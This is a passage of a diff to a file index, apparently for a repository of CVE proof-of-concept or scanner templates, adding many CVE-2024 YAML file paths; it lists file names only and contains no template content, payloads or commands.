./poc/cve/CVE-2024-10516.yaml ./poc/cve/CVE-2024-10517-210079a1dc04e7802385a59afa112a94.yaml +./poc/cve/CVE-2024-10517.yaml ./poc/cve/CVE-2024-10518-8fbb12f5bd52a37d5ae88c83f3c10fed.yaml +./poc/cve/CVE-2024-10518.yaml ./poc/cve/CVE-2024-10519-e4ed2d5cfcede1f54bb2e43cfa2269d7.yaml ./poc/cve/CVE-2024-10519.yaml ./poc/cve/CVE-2024-10520-e565e8010591b8cf25b393d5f18f3d3c.yaml @@ -37016,6 +37049,7 @@ ./poc/cve/CVE-2024-10567-0a6cb3b80cd64d50d19a1e3c009329aa.yaml ./poc/cve/CVE-2024-10567.yaml ./poc/cve/CVE-2024-10568-9765873fc9eb5df11bad8c11c4bb8f5f.yaml +./poc/cve/CVE-2024-10568.yaml ./poc/cve/CVE-2024-1057-7965d17e1316abe215e22b7e9f9e3d34.yaml ./poc/cve/CVE-2024-1057.yaml ./poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml @@ -37078,6 +37112,7 @@ ./poc/cve/CVE-2024-10640.yaml ./poc/cve/CVE-2024-10645-12fb06a8e024b16633ddff06befd81c1.yaml ./poc/cve/CVE-2024-10645.yaml +./poc/cve/CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0.yaml ./poc/cve/CVE-2024-10647-f9db24370dab16c6bbf61c415c445725.yaml ./poc/cve/CVE-2024-10647.yaml ./poc/cve/CVE-2024-10663-3da367fa8633c57d627a006d7a8ee98c.yaml @@ -37132,6 +37167,7 @@ ./poc/cve/CVE-2024-10689.yaml ./poc/cve/CVE-2024-1069-eade4f165a3dd4a95074ea430cf7d5a1.yaml ./poc/cve/CVE-2024-1069.yaml +./poc/cve/CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03.yaml ./poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml ./poc/cve/CVE-2024-10692.yaml ./poc/cve/CVE-2024-10693-c432d0b08f287a25140732c41d4a1ed1.yaml @@ -37143,7 +37179,9 @@ ./poc/cve/CVE-2024-1070-2eaf969a3130409b034463b1e7ec7297.yaml ./poc/cve/CVE-2024-1070.yaml ./poc/cve/CVE-2024-10704-a70e8bbf9a1e090c995118fbf05ef043.yaml +./poc/cve/CVE-2024-10704.yaml ./poc/cve/CVE-2024-10708-a94086c9c44731fdca495f410cfc1b1e.yaml +./poc/cve/CVE-2024-10708.yaml ./poc/cve/CVE-2024-10709-645acc80e460ffaad4f2931d5b432c17.yaml ./poc/cve/CVE-2024-10709.yaml ./poc/cve/CVE-2024-1071-2920c7e3fa1eab9da1c8d6b582e0a18a.yaml @@ -37191,6 +37229,7 @@ ./poc/cve/CVE-2024-10782-871d48d03543e0a74eec4ebf111104a8.yaml ./poc/cve/CVE-2024-10782.yaml ./poc/cve/CVE-2024-10783-194d14e49a97ce9ed7766354ddcc8c6e.yaml +./poc/cve/CVE-2024-10783.yaml ./poc/cve/CVE-2024-10784-a9a3accfcb71b14272acd952c8e27676.yaml ./poc/cve/CVE-2024-10784.yaml ./poc/cve/CVE-2024-10785-752c3d56038fb0ae320f03c3f333b1cb.yaml @@ -37323,9 +37362,11 @@ ./poc/cve/CVE-2024-10891-fa9a5840659417f63d1b11b08fefde99.yaml ./poc/cve/CVE-2024-10891.yaml ./poc/cve/CVE-2024-10893-a8b2ddc814e2620ef1ea708f58ef3008.yaml +./poc/cve/CVE-2024-10893.yaml ./poc/cve/CVE-2024-10895-125b0ba72b1a6673f446504c466d0343.yaml ./poc/cve/CVE-2024-10895.yaml ./poc/cve/CVE-2024-10896-b87b742b653c072456023acb4e76af1e.yaml +./poc/cve/CVE-2024-10896.yaml ./poc/cve/CVE-2024-10897-ab1515a8b949e2160b82943aac5fdd90.yaml ./poc/cve/CVE-2024-10897.yaml ./poc/cve/CVE-2024-10898-b43005807c533ecbdf603447a2e9841b.yaml @@ -37373,6 +37414,7 @@ ./poc/cve/CVE-2024-10962-b5d6c73fa07a42d3299578c2a0d3f408.yaml ./poc/cve/CVE-2024-10962.yaml ./poc/cve/CVE-2024-10980-e93e9bf451e7535bca72e467980f5955.yaml +./poc/cve/CVE-2024-10980.yaml ./poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml ./poc/cve/CVE-2024-11002.yaml ./poc/cve/CVE-2024-11008-db2446809c807d08d31f51bc0a794536.yaml @@ -37382,6 +37424,7 @@ ./poc/cve/CVE-2024-11010-7519a29fa5d8193b924c132cd64d9dbf.yaml ./poc/cve/CVE-2024-11010.yaml ./poc/cve/CVE-2024-11012-07fb523fa0ee4232af334e98e3c26772.yaml +./poc/cve/CVE-2024-11012.yaml ./poc/cve/CVE-2024-11015-6e35173347ce54ae4cf946a171ea1ef3.yaml ./poc/cve/CVE-2024-11015.yaml ./poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml @@ -37424,6 +37467,7 @@ ./poc/cve/CVE-2024-11093.yaml ./poc/cve/CVE-2024-11094-16bcde675cb0d64a03b0f91cfb9ac467.yaml ./poc/cve/CVE-2024-11094.yaml +./poc/cve/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml ./poc/cve/CVE-2024-11098-1c24316a7d199994f4a28999bc5b5957.yaml ./poc/cve/CVE-2024-11098.yaml ./poc/cve/CVE-2024-1110-0fb9f8781d2d67ac9582406680f943b4.yaml @@ -37435,6 +37479,7 @@ ./poc/cve/CVE-2024-11106-389e9d6f4ce7e6f2ceef8b5009140dc7.yaml ./poc/cve/CVE-2024-11106.yaml ./poc/cve/CVE-2024-11107-eedf99f3343eab66ce27c56f82118688.yaml +./poc/cve/CVE-2024-11107.yaml ./poc/cve/CVE-2024-11118-e75c108a13b6a2366005bdd8aa42aa89.yaml ./poc/cve/CVE-2024-11118.yaml ./poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml @@ -37442,6 +37487,7 @@ ./poc/cve/CVE-2024-1112.yaml ./poc/cve/CVE-2024-11125.yaml ./poc/cve/CVE-2024-11140-59c50b763fa3b85c4c06d48cf812f8e0.yaml +./poc/cve/CVE-2024-11140.yaml ./poc/cve/CVE-2024-11143-c1f2d03748f173b3fd4ffd310317801b.yaml ./poc/cve/CVE-2024-11143.yaml ./poc/cve/CVE-2024-11150-1e0c95c68ba4bd2bce88bb13895883b7.yaml @@ -37457,11 +37503,13 @@ ./poc/cve/CVE-2024-11181-c4fe63ba0d26dbd617ef2b28c772fba5.yaml ./poc/cve/CVE-2024-11181.yaml ./poc/cve/CVE-2024-11183-740e0e624799af0f29235cfe4c93224c.yaml +./poc/cve/CVE-2024-11183.yaml ./poc/cve/CVE-2024-11188-51588612655d9b3510e7392186140cd0.yaml ./poc/cve/CVE-2024-11188.yaml ./poc/cve/CVE-2024-1119-f409952ee3d6dca89fd2240564c4bf88.yaml ./poc/cve/CVE-2024-1119.yaml ./poc/cve/CVE-2024-11190-815c4afdf39ca536261160cd80e26e43.yaml +./poc/cve/CVE-2024-11190.yaml ./poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml ./poc/cve/CVE-2024-11192.yaml ./poc/cve/CVE-2024-11194-fef16dd85f2f17cbac8618d7471c25a5.yaml @@ -37503,6 +37551,7 @@ ./poc/cve/CVE-2024-1122-5f1c2e67352badc3464a23f2df4684bd.yaml ./poc/cve/CVE-2024-1122.yaml ./poc/cve/CVE-2024-11221-fd998e8034a09be96ea1e90e75cb53d4.yaml +./poc/cve/CVE-2024-11221.yaml ./poc/cve/CVE-2024-11224-00fc21f7e5858419f5ee0911bc9c6261.yaml ./poc/cve/CVE-2024-11224.yaml ./poc/cve/CVE-2024-11225-4d2d005fcdf5576ec7648d7b60c4ad7d.yaml @@ -37532,6 +37581,7 @@ ./poc/cve/CVE-2024-1127-96dba372bfefb2c18f635a1075e27756.yaml ./poc/cve/CVE-2024-1127.yaml ./poc/cve/CVE-2024-11275-206acacc954728d70b76a3dfcd2a713b.yaml +./poc/cve/CVE-2024-11275.yaml ./poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml ./poc/cve/CVE-2024-11276.yaml ./poc/cve/CVE-2024-11277-371669e41b1bdbea10af14d85581448c.yaml @@ -37609,6 +37659,7 @@ ./poc/cve/CVE-2024-11366-cc7c5723ad039e93a1f894e0ec9c21a6.yaml ./poc/cve/CVE-2024-11366.yaml ./poc/cve/CVE-2024-11367-4392dd5590d051190c7b848c08c2e24d.yaml +./poc/cve/CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93.yaml ./poc/cve/CVE-2024-11367.yaml ./poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml ./poc/cve/CVE-2024-11368.yaml @@ -37618,7 +37669,9 @@ ./poc/cve/CVE-2024-11371-95a048e99cf0968d3759cd47fec02e09.yaml ./poc/cve/CVE-2024-11371.yaml ./poc/cve/CVE-2024-11372-19add4c9d86c1440f92c818767e272d4.yaml +./poc/cve/CVE-2024-11372.yaml ./poc/cve/CVE-2024-11373-b5dca7f583f1b8366026d4d92294f88d.yaml +./poc/cve/CVE-2024-11373.yaml ./poc/cve/CVE-2024-11374-5e058c4cfdb79709cb4c1958dcfa10ca.yaml ./poc/cve/CVE-2024-11374.yaml ./poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml @@ -37660,6 +37713,7 @@ ./poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml ./poc/cve/CVE-2024-11416.yaml ./poc/cve/CVE-2024-11417-4d82a0010b0e9010174b1d477dc61dcf.yaml +./poc/cve/CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml ./poc/cve/CVE-2024-11417.yaml ./poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml ./poc/cve/CVE-2024-11418.yaml @@ -37725,6 +37779,7 @@ ./poc/cve/CVE-2024-11460.yaml ./poc/cve/CVE-2024-11461-79c81f7450c8a8210454f180a585b023.yaml ./poc/cve/CVE-2024-11461.yaml +./poc/cve/CVE-2024-11462-8df69847f3be73a75d55847984a2d955.yaml ./poc/cve/CVE-2024-11463-0bf104abede23adeb8af80d1e15ce8a5.yaml ./poc/cve/CVE-2024-11463.yaml ./poc/cve/CVE-2024-11464-e3ddfb3c3eeafb3077e966e3de489912.yaml @@ -37734,6 +37789,7 @@ ./poc/cve/CVE-2024-11501-6648e003ce861122d6bdf36694ec0ac2.yaml ./poc/cve/CVE-2024-11501.yaml ./poc/cve/CVE-2024-11502-e69268cf79e16efe674087f9897a7a26.yaml +./poc/cve/CVE-2024-11502.yaml ./poc/cve/CVE-2024-1157-d2b245ef8566e249301cbac489385050.yaml ./poc/cve/CVE-2024-1157.yaml ./poc/cve/CVE-2024-1158-c524eecd9e35e784bb852f087dadba65.yaml @@ -37787,8 +37843,16 @@ ./poc/cve/CVE-2024-11709.yaml ./poc/cve/CVE-2024-1171-a63821ba8371483619de0d156ffdf0ac.yaml ./poc/cve/CVE-2024-1171.yaml +./poc/cve/CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1.yaml +./poc/cve/CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e.yaml +./poc/cve/CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47.yaml +./poc/cve/CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5.yaml +./poc/cve/CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9.yaml +./poc/cve/CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b.yaml ./poc/cve/CVE-2024-1172-39dfeb3662991e9d246c7171e032fdd6.yaml ./poc/cve/CVE-2024-1172.yaml +./poc/cve/CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9.yaml +./poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml ./poc/cve/CVE-2024-11723-3366767029ed4cddc51404d71df8d881.yaml ./poc/cve/CVE-2024-11723.yaml ./poc/cve/CVE-2024-11724-daedb7c1f67f714549143733b33e7b1b.yaml @@ -37813,24 +37877,32 @@ ./poc/cve/CVE-2024-1175.yaml ./poc/cve/CVE-2024-11750-45ece19af7c7b8fa9097233e3847553d.yaml ./poc/cve/CVE-2024-11750.yaml +./poc/cve/CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134.yaml +./poc/cve/CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531.yaml ./poc/cve/CVE-2024-11754-f1c9edc69abf1d1c2adb003324039811.yaml +./poc/cve/CVE-2024-11754.yaml +./poc/cve/CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml ./poc/cve/CVE-2024-11757-032880ca2703aa26f064cf37fbe958e7.yaml ./poc/cve/CVE-2024-11757.yaml +./poc/cve/CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383.yaml ./poc/cve/CVE-2024-1176-b512894031a2bed74d78afe197de5814.yaml ./poc/cve/CVE-2024-1176.yaml ./poc/cve/CVE-2024-11760-6e664de535f5a95586bf27ac0d050730.yaml ./poc/cve/CVE-2024-11760.yaml ./poc/cve/CVE-2024-11761-c12436c899eba37de36a3435c092ea47.yaml ./poc/cve/CVE-2024-11761.yaml +./poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml ./poc/cve/CVE-2024-11765-76af6f6ec0d2cae37ca638893b9e6e7c.yaml ./poc/cve/CVE-2024-11765.yaml ./poc/cve/CVE-2024-11766-fd7f6ce68e6a6e08672ed4d2add9dced.yaml ./poc/cve/CVE-2024-11766.yaml ./poc/cve/CVE-2024-11767-91a6d26ebb5178e02ef1e638799045fa.yaml +./poc/cve/CVE-2024-11767.yaml ./poc/cve/CVE-2024-11769-b830f60593d6bc500bc45458ecb55b68.yaml ./poc/cve/CVE-2024-11769.yaml ./poc/cve/CVE-2024-1177-44b068407f4a1063af5594e6bad17afb.yaml ./poc/cve/CVE-2024-1177.yaml +./poc/cve/CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663.yaml ./poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml ./poc/cve/CVE-2024-11779.yaml ./poc/cve/CVE-2024-1178-26b664c2c5e2ce23e9059d41408b3b04.yaml @@ -37852,6 +37924,7 @@ ./poc/cve/CVE-2024-11807-4dfe886308ff3702aa6f118a69b41dde.yaml ./poc/cve/CVE-2024-11807.yaml ./poc/cve/CVE-2024-11809-f088a4ea2afc64dbeeb9c239f0dd835c.yaml +./poc/cve/CVE-2024-11809.yaml ./poc/cve/CVE-2024-1181-e1aeb270ea4b669129dd0982e0118a5d.yaml ./poc/cve/CVE-2024-1181.yaml ./poc/cve/CVE-2024-11813-9a6d1b16c5d6577e7e1c14516dfd9060.yaml @@ -37861,11 +37934,14 @@ ./poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml ./poc/cve/CVE-2024-11823.yaml ./poc/cve/CVE-2024-11827-1cfd9f40aa296523889f437bba603561.yaml +./poc/cve/CVE-2024-11827.yaml ./poc/cve/CVE-2024-1183.yaml ./poc/cve/CVE-2024-11832-ce764e7c1b8ba11b8ae5c2880094a1b5.yaml +./poc/cve/CVE-2024-11832.yaml ./poc/cve/CVE-2024-11840-fa84463fd67e8af47f1ae8ec0d444f84.yaml ./poc/cve/CVE-2024-11840.yaml ./poc/cve/CVE-2024-11841-f3a00a85c2a669580537ad1d561981fa.yaml +./poc/cve/CVE-2024-11841.yaml ./poc/cve/CVE-2024-11842-05f72fa98be727d359ddc8bb2735cf2c.yaml ./poc/cve/CVE-2024-11842.yaml ./poc/cve/CVE-2024-11844-07ec12dfcaf6ca937ccce1eaaff746ba.yaml @@ -37874,20 +37950,33 @@ ./poc/cve/CVE-2024-11853.yaml ./poc/cve/CVE-2024-11854-a4609a0b6d30b84bf011e2cc0f757890.yaml ./poc/cve/CVE-2024-11854.yaml +./poc/cve/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml +./poc/cve/CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324.yaml ./poc/cve/CVE-2024-11866-3ba6e3d22ebebc0d52abd8e6540b8ac0.yaml ./poc/cve/CVE-2024-11866.yaml +./poc/cve/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml ./poc/cve/CVE-2024-11868-73a881cdb32507d918f8143682e8cdbd.yaml ./poc/cve/CVE-2024-11868.yaml +./poc/cve/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml ./poc/cve/CVE-2024-11871-59d6f7cc74f7a02c390512999ead182e.yaml ./poc/cve/CVE-2024-11871.yaml +./poc/cve/CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f.yaml ./poc/cve/CVE-2024-11875-24c03b20fb28f6988a6747a0cda3c19a.yaml ./poc/cve/CVE-2024-11875.yaml +./poc/cve/CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml +./poc/cve/CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca.yaml +./poc/cve/CVE-2024-11879-59310d2dceea2163a5176b76507b44eb.yaml ./poc/cve/CVE-2024-11880-c4c58d47a5ee0ae307eff48c75fa9422.yaml ./poc/cve/CVE-2024-11880.yaml ./poc/cve/CVE-2024-11882-ea7a3f25a6986885eafd4392096ffc0e.yaml ./poc/cve/CVE-2024-11882.yaml +./poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml +./poc/cve/CVE-2024-11884-55f612c1021e30ed6e11056cd7729031.yaml +./poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml +./poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml ./poc/cve/CVE-2024-11891-5fc76ceed31c732ecf98a91613f60c7c.yaml ./poc/cve/CVE-2024-11891.yaml +./poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml ./poc/cve/CVE-2024-11897-ff5f1c15b11b473bc3f465bc84ff070d.yaml ./poc/cve/CVE-2024-11897.yaml ./poc/cve/CVE-2024-11898-e1ae02693b266829682dda11586fd4c0.yaml @@ -37900,7 +37989,9 @@ ./poc/cve/CVE-2024-11904-5fe3b58edbf68a55952920a93fb3f296.yaml ./poc/cve/CVE-2024-11904.yaml ./poc/cve/CVE-2024-11910-f64cb945375a031c726e01062aefcdec.yaml +./poc/cve/CVE-2024-11910.yaml ./poc/cve/CVE-2024-11911-faf718aed0ef166f0179212ee8a9f3c3.yaml +./poc/cve/CVE-2024-11911.yaml ./poc/cve/CVE-2024-11914-c373722513f4866f4994cae968afdfbb.yaml ./poc/cve/CVE-2024-11914.yaml ./poc/cve/CVE-2024-11918-095887b4ec8bd9bbd522023a03b46270.yaml @@ -37926,6 +38017,7 @@ ./poc/cve/CVE-2024-12004-f153a59c093bcc077a8d5197337c2b1a.yaml ./poc/cve/CVE-2024-12004.yaml ./poc/cve/CVE-2024-12015-a21eb9ced96f7c622c2eb418f1acf002.yaml +./poc/cve/CVE-2024-12015.yaml ./poc/cve/CVE-2024-12018-b67e863b9a9f4ab6c184953361a73ebe.yaml ./poc/cve/CVE-2024-12018.yaml ./poc/cve/CVE-2024-12026-048d32aed4281761d7c921ef3e5b09bc.yaml @@ -37944,6 +38036,7 @@ ./poc/cve/CVE-2024-12040-589a93ad55cf57c9e5956332b8034579.yaml ./poc/cve/CVE-2024-12040.yaml ./poc/cve/CVE-2024-12042-d175dab1029fa17bfb46ec52ed2225e6.yaml +./poc/cve/CVE-2024-12042.yaml ./poc/cve/CVE-2024-1205-e2d04199f24f3462f8280e4435b06ec0.yaml ./poc/cve/CVE-2024-1205.yaml ./poc/cve/CVE-2024-12059-339b76a06be0749e69485be29f27c41a.yaml @@ -38030,7 +38123,9 @@ ./poc/cve/CVE-2024-1230-c16c6920d1a9d323e3888c155daedfe0.yaml ./poc/cve/CVE-2024-1230.yaml ./poc/cve/CVE-2024-12300-fbca05b17c67e0a0b0725e51de7d84fc.yaml +./poc/cve/CVE-2024-12300.yaml ./poc/cve/CVE-2024-12309-a66a88222b4d4522bfdbcfa49436df90.yaml +./poc/cve/CVE-2024-12309.yaml ./poc/cve/CVE-2024-1231-3e05aabff416a11152b5276e4665c1a8.yaml ./poc/cve/CVE-2024-1231.yaml ./poc/cve/CVE-2024-12312-b3b87a75b93fb272d6e12dde155da819.yaml @@ -38064,26 +38159,50 @@ ./poc/cve/CVE-2024-1240.yaml ./poc/cve/CVE-2024-12406-875253838d8ed29a504f0efa7c687009.yaml ./poc/cve/CVE-2024-12406.yaml +./poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml ./poc/cve/CVE-2024-12414-86f1cff4a3be047a175aa262edd3a292.yaml +./poc/cve/CVE-2024-12414.yaml ./poc/cve/CVE-2024-12417-4592606a248f09bd9c69bf93e7bb5817.yaml +./poc/cve/CVE-2024-12417.yaml ./poc/cve/CVE-2024-1242-a569bc45f6230e6ee70cfafb1a0c54a4.yaml ./poc/cve/CVE-2024-1242.yaml ./poc/cve/CVE-2024-12420-bd0164689b2a5de480b05483a455d4bf.yaml +./poc/cve/CVE-2024-12420.yaml ./poc/cve/CVE-2024-12421-3364cc8f248f3c81c66642b52b7e4546.yaml +./poc/cve/CVE-2024-12421.yaml +./poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml ./poc/cve/CVE-2024-12441-1756d8f05db11c9f2310e3f212f24527.yaml ./poc/cve/CVE-2024-12441-74e5d36f1605e404ac6d859d22377c3d.yaml ./poc/cve/CVE-2024-12441.yaml +./poc/cve/CVE-2024-12446-2affa83d9110434c8964fc4fe186651f.yaml +./poc/cve/CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d.yaml +./poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml +./poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml +./poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml ./poc/cve/CVE-2024-12461-1c77a2a88fdc8a5d22bbceec6cc12bc6.yaml ./poc/cve/CVE-2024-12461.yaml ./poc/cve/CVE-2024-12463-6eda08e61f79b144451ec9eed8e6585a.yaml ./poc/cve/CVE-2024-12463.yaml ./poc/cve/CVE-2024-12465-cee6fb491f26feabdcf3dcaa9d9a88a9.yaml +./poc/cve/CVE-2024-12465.yaml +./poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml +./poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml +./poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml +./poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml +./poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml ./poc/cve/CVE-2024-12526-d0175a79efc04628234f5b16874bd415.yaml ./poc/cve/CVE-2024-12526.yaml +./poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml ./poc/cve/CVE-2024-12572-99c5fc1f98bec101dce40530a6fa4801.yaml +./poc/cve/CVE-2024-12572.yaml ./poc/cve/CVE-2024-12574-411e698a90aecedc46e74ff8fd9e6336.yaml +./poc/cve/CVE-2024-12574.yaml +./poc/cve/CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3.yaml ./poc/cve/CVE-2024-12579-8e5be395d9ca09c678a7625547b378e8.yaml +./poc/cve/CVE-2024-12579.yaml ./poc/cve/CVE-2024-12581-76cef049807f0d0c701a5c76e40729ed.yaml +./poc/cve/CVE-2024-12581.yaml +./poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml ./poc/cve/CVE-2024-1273-7a7d027c3b90e9a4f71fda8d00cf65ff.yaml ./poc/cve/CVE-2024-1273.yaml ./poc/cve/CVE-2024-1274-99ad6cb9c59b62a5b587ddfed8885ae2.yaml @@ -43624,6 +43743,7 @@ ./poc/cve/CVE-2024-3725.yaml ./poc/cve/CVE-2024-37250-5ca0fafe07d06e20f58a95dbac8031fe.yaml ./poc/cve/CVE-2024-37250-cec91cbf25d411fc5c4746b653491fd3.yaml +./poc/cve/CVE-2024-37250.yaml ./poc/cve/CVE-2024-37253-36589268003ddfec7c7fd96d0d209541.yaml ./poc/cve/CVE-2024-37253.yaml ./poc/cve/CVE-2024-37254-ac5746faf397f9f1ccc063bbc8b11849.yaml @@ -45088,6 +45208,7 @@ ./poc/cve/CVE-2024-43221-c139bff8e07f1a30675d427e53a252b5.yaml ./poc/cve/CVE-2024-43221.yaml ./poc/cve/CVE-2024-43222-a87ec38511fe9aca759e14cc043b51af.yaml +./poc/cve/CVE-2024-43222.yaml ./poc/cve/CVE-2024-43223-307220846bdcd167f9115884d0175899.yaml ./poc/cve/CVE-2024-43223.yaml ./poc/cve/CVE-2024-43224-bf74b0250e998360257b17cb9f6cad9d.yaml @@ -45249,6 +45370,7 @@ ./poc/cve/CVE-2024-43299-c8dd9f7fde9fffe6e6504776bb91f262.yaml ./poc/cve/CVE-2024-43299.yaml ./poc/cve/CVE-2024-43300-1ff6882a36c1af79508de845a52c5f74.yaml +./poc/cve/CVE-2024-43300.yaml ./poc/cve/CVE-2024-43301-e70a166216c8c165db0d83860ef1272c.yaml ./poc/cve/CVE-2024-43301.yaml ./poc/cve/CVE-2024-43302-7eb579c0aaaf235ed55e89a50bb63283.yaml @@ -45577,6 +45699,7 @@ ./poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml ./poc/cve/CVE-2024-43967.yaml ./poc/cve/CVE-2024-43968-4400b028a60e9b43044e8761dabd34b3.yaml +./poc/cve/CVE-2024-43968.yaml ./poc/cve/CVE-2024-43969-abbe9736868bf38487d2e6fcf0603277.yaml ./poc/cve/CVE-2024-43969.yaml ./poc/cve/CVE-2024-4397-c362279c76703f9b7d6880221e199134.yaml @@ -46159,6 +46282,7 @@ ./poc/cve/CVE-2024-47320-f6b0315c3bcc3c744bd1900e0cbde2e8.yaml ./poc/cve/CVE-2024-47320.yaml ./poc/cve/CVE-2024-47321-f5ac5a08ba05fc79b1104aeb1b8f65d9.yaml +./poc/cve/CVE-2024-47321.yaml ./poc/cve/CVE-2024-47322-3c3616a19fd59bc87a8c7cceabf80e70.yaml ./poc/cve/CVE-2024-47322.yaml ./poc/cve/CVE-2024-47323-ba1ef6c22331af58e0db8e651bce993c.yaml @@ -46774,6 +46898,7 @@ ./poc/cve/CVE-2024-49322-7e6d37525f1528a44db12245f4e4a70b.yaml ./poc/cve/CVE-2024-49322.yaml ./poc/cve/CVE-2024-49323-61e0800fe6baa2cae8b68fbd815349c4.yaml +./poc/cve/CVE-2024-49323.yaml ./poc/cve/CVE-2024-49324-94626a2451c42720f09d79e87f8039a1.yaml ./poc/cve/CVE-2024-49324.yaml ./poc/cve/CVE-2024-49325-0df62d9e39ee3d5fce1ee7a0db78ae67.yaml @@ -46793,6 +46918,7 @@ ./poc/cve/CVE-2024-49332-4b3daa3fbf047fa59a99b065006fbbe3.yaml ./poc/cve/CVE-2024-49332.yaml ./poc/cve/CVE-2024-49334-11700dd427899256e6373b115ef06811.yaml +./poc/cve/CVE-2024-49334.yaml ./poc/cve/CVE-2024-49335-952c0d4037d50aa974ebe435838a2a76.yaml ./poc/cve/CVE-2024-49335.yaml ./poc/cve/CVE-2024-4934-b5b8c6ef935e9391d95271babb255eee.yaml @@ -47053,6 +47179,7 @@ ./poc/cve/CVE-2024-5028-2b1c7753e02398d12917feca766a8f54.yaml ./poc/cve/CVE-2024-5028.yaml ./poc/cve/CVE-2024-5029-eabfce5ae00a84e55589a7640da45e1c.yaml +./poc/cve/CVE-2024-5029.yaml ./poc/cve/CVE-2024-5030-dc496a1ae6661dbfcc2449945b36f599.yaml ./poc/cve/CVE-2024-5030.yaml ./poc/cve/CVE-2024-5031-80379b4c5e0594f1610919951372e2c7.yaml @@ -47105,6 +47232,7 @@ ./poc/cve/CVE-2024-50422-f497bcd2465c4c2503bbf561d398447b.yaml ./poc/cve/CVE-2024-50422.yaml ./poc/cve/CVE-2024-50423-e7e041c790fe504684de2e185f30a8e2.yaml +./poc/cve/CVE-2024-50423.yaml ./poc/cve/CVE-2024-50424-06ff55d982c5f886718e08cf1a5763f8.yaml ./poc/cve/CVE-2024-50424.yaml ./poc/cve/CVE-2024-50425-4420930ca185bc7638b4b6604241c969.yaml @@ -47258,17 +47386,29 @@ ./poc/cve/CVE-2024-50502-f025837a07fccc883502f1b0b0b998e4.yaml ./poc/cve/CVE-2024-50502.yaml ./poc/cve/CVE-2024-50504-dd2a52c91cedd2c370ed91df355bfdba.yaml +./poc/cve/CVE-2024-50504.yaml ./poc/cve/CVE-2024-50506-4d3cb42ced965efd1907b845f06c8f7d.yaml +./poc/cve/CVE-2024-50506.yaml ./poc/cve/CVE-2024-50507-51ddef91051431f4533a4f6a3fe8afd5.yaml +./poc/cve/CVE-2024-50507.yaml ./poc/cve/CVE-2024-50508-ce09f3e88a290df0e82d6f222274970f.yaml +./poc/cve/CVE-2024-50508.yaml ./poc/cve/CVE-2024-50509-629fe701bf3b8fa380113ae2d245568b.yaml +./poc/cve/CVE-2024-50509.yaml ./poc/cve/CVE-2024-50510-0f258545969915717983830459c9be02.yaml +./poc/cve/CVE-2024-50510.yaml ./poc/cve/CVE-2024-50511-29b214c219866f7f2500c02f16eae355.yaml +./poc/cve/CVE-2024-50511.yaml ./poc/cve/CVE-2024-50512-237b303d56b5af70349547129fcdbed3.yaml +./poc/cve/CVE-2024-50512.yaml 